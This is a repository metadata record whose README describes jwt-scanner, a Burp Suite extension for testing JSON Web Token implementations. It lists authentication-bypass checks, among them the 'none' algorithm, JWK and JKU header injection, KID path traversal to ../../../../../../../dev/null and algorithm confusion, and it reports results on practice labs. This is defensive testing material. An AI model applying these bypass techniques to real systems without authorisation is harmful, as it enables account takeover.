{"id":23196679,"url":"https://github.com/compasssecurity/jwt-scanner","last_synced_at":"2025-08-18T22:32:00.344Z","repository":{"id":224573257,"uuid":"763406064","full_name":"CompassSecurity/jwt-scanner","owner":"CompassSecurity","description":"JWT-scanner Burp Extension","archived":false,"fork":false,"pushed_at":"2024-05-21T15:21:53.000Z","size":205,"stargazers_count":18,"open_issues_count":2,"forks_count":2,"subscribers_count":4,"default_branch":"master","last_synced_at":"2024-05-21T16:38:37.893Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/CompassSecurity.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-02-26T08:30:50.000Z","updated_at":"2024-05-21T16:38:41.306Z","dependencies_parsed_at":null,"dependency_job_id":"cff40670-9fc1-42dc-a555-712729454dc7","html_url":"https://github.com/CompassSecurity/jwt-scanner","commit_stats":null,"previous_names":["compasssecurity/jwt-attacker","compasssecurity/jwt-scanner"],"tags_count":5,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CompassSecurity%2Fjwt-scanner","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CompassSecurity%2Fjwt-scanner/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CompassSecurity%2Fjwt-scanner/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CompassSecurity%2Fjwt-scanner/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/CompassSecurity","download_url":"https://codeload.github.com/CompassSecurity/jwt-scanner/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":230284196,"owners_count":18202347,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-12-18T14:20:01.298Z","updated_at":"2025-08-18T22:32:00.333Z","avatar_url":"https://github.com/CompassSecurity.png","language":"Java","readme":"# JWT-scanner - Burp Extension\n\n## Description\nJWT Scanner is a Burp Suite extension designed for the automated testing of JSON Web Token (JWT) implementations in web applications.\n\n## Features\n- Automatically detects JWTs in the selected base request.\n- Allows manual selection of the target JWT in the base request.\n- Enables the selection of two base requests with different JWTs to attempt forging the public key.\n\n### Checks\n- Determines whether the algorithm is symmetric, asymmetric, or unknown. If symmetric, brute-forcing may be attempted.\n- Checks if the JWT has an expiry. If it does not, an alert is generated. If it has expired, the scanner checks if\n  it is still accepted; if so, an alert is generated. If not, an issue is raised since further checks may not work.\n  It is advised not to select an already expired JWT. If the JWT has not yet expired, a future check will be scheduled\n  to verify if the JWT is still accepted once the expiry is reached. If it is accepted, the appropriate alert will be\n  displayed.\n- Checks and alerts if the JWT is accepted without a signature.\n- Checks and alerts if the JWT is accepted with an invalid signature.\n- Checks and alerts if the JWT is accepted when signed symmetrically with an empty password.\n- Checks and alerts if the JWT is accepted with variations of the \"none\" algorithm (e.g., none, NONE, NoNE, etc.).\n- Checks and alerts if JWT verification is vulnerable to CVE-2022-21449.\n- Checks and alerts if the JWT is accepted with an injected JWK header containing a self-generated public key.\n- Checks and alerts if the server calls the URL in the JKU header (JKU pingback).\n- Checks and alerts if the JWT is accepted with an injected JKU header pointing to a custom host that hosts a self-generated public key.\n- Checks and alerts if the JWT is accepted when the KID header points to ../../../../../../../dev/null and the JWT is \n  signed with an empty password (KID path traversal).\n- Checks for exposed public keys via the JKU header or well-known paths.\n- Checks and alerts if the JWT is accepted when signed symmetrically with the exposed public key (algorithm confusion).\n- Checks and alerts if the JWT is accepted when signed symmetrically with a forged public key (algorithm confusion).\n- If any of the checks result in the server responding with a status code of 500 (Internal Server Error), an issue is created,\n  as it may be worthwhile to investigate this further.\n\n## Limitations\n- Brute-forcing of symmetric keys is not implemented.\n- KID path traversal is limited as it only attempts one path (../../../../../../../dev/null).\n- Forging a public key requires the gmp native library (see https://gmplib.org). Compiled binaries are only supplied for the most\n  common architectures via the JAR file (linux\\_64, windows\\_64, macos\\_64, macos\\_arm64).\n\n## Benchmarks\n\n### Compass Demo\n```\nhttps://www.compass-demo.com/jwt_lab/\n\nLevel 1:  PASS\nLevel 2:  PASS\nLevel 3:  PASS\nLevel 4:  FAIL  note: brute-forcing key not implemented\nLevel 5:  PASS\n```\n\n### Portswigger Labs\n```\nhttps://portswigger.net/web-security/all-labs#jwt\n\nJWT authentication bypass via unverified signature:                     PASS\nJWT authentication bypass via flawed signature verification:            PASS\nJWT authentication bypass via weak signing key:                         FAIL  note: brute-forcing key not implemented\nJWT authentication bypass via jwk header injection:                     PASS\nJWT authentication bypass via jku header injection:                     FAIL  note: the lab does not resolve external URLs\nJWT authentication bypass via kid header path traversal:                PASS\nJWT authentication bypass via algorithm confusion:                      PASS\nJWT authentication bypass via algorithm confusion with no exposed key:  PASS\n```\n\n### NeuronLegion brokencrystals\n```\nhttps://github.com/NeuraLegion/brokencrystals\n\nInvalid Signature              PASS\nKID SQL Injection              FAIL  note: sql-injection via kid header not implemented\nBrute Forcing Weak Secret Key  FAIL  note: brute-forcing key not implemented\nRSA to HMAC                    FAIL  note: cannot craft a valid base request\nX5U Rogue Key                  FAIL  note: not implemented\nX5C Rogue Key                  FAIL  note: not implemented\nJKU Rogue Key                  FAIL  note: jku pointing to a \"JWK\" not \"JWK Set\" (https://github.com/NeuraLegion/brokencrystals/issues/511)\nJWK Rogue Key                  PASS\n```\n\n## Usage\nRun an active scan or manually select a request from to check:\n\n1. Go to  Proxy / Repeater / Target / Logger / Intruder\n2. Select request that requires a authentication with a valid JWT and returns a HTTP 200 response\n\n### Automatically detect JWT\n1. Right-click on the request you want to check.\n2. Extension -\u003e JWT Scanner -\u003e Scan (autodetect)\n3. In case of a identified vulnerability a issue is generated\n\nAutodetect JWT from valid request:\n\n![](docs/auto_select.png)\n\n### Manually select JWT\n1. Highlight the target JWT in request\n2. Right-click highlighted JWT request\n3. Extension -\u003e JWT Scanner -\u003e Scan selected\n4. In case of a identified vulnerability a issue is generated\n\nManually select JWT from valid request:\n\n![](docs/manual_select.png)\n\n### Forging public keys\n\nIf a public key is not exposed, you can try forge one.\n\n1. Select two base requests each containing exactly one but different JWT\n2. Right-click highlighted JWT requests\n3. Extension -\u003e JWT Scanner -\u003e Forge public key\n4. Investigate Event and Issue log\n5. If successful rerun \"Scan (autodetect)\" or \"Scan selected\"\n\n![](docs/forge_public_key.png)\n\n## Installation\n1. Download the latest pre-built jar file from [releases](https://github.com/CompassSecurity/jwt-scanner/releases).\n2. Extension -\u003e Installed -\u003e Add -\u003e Extension Details -\u003e Extension Type: *Java* -\u003e Select file ...\n3. Select the downloaded jar\n\n## Build\nUsing gradle to build jar:\n```shell\n./gradlew jar\n```\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcompasssecurity%2Fjwt-scanner","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcompasssecurity%2Fjwt-scanner","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcompasssecurity%2Fjwt-scanner/lists"}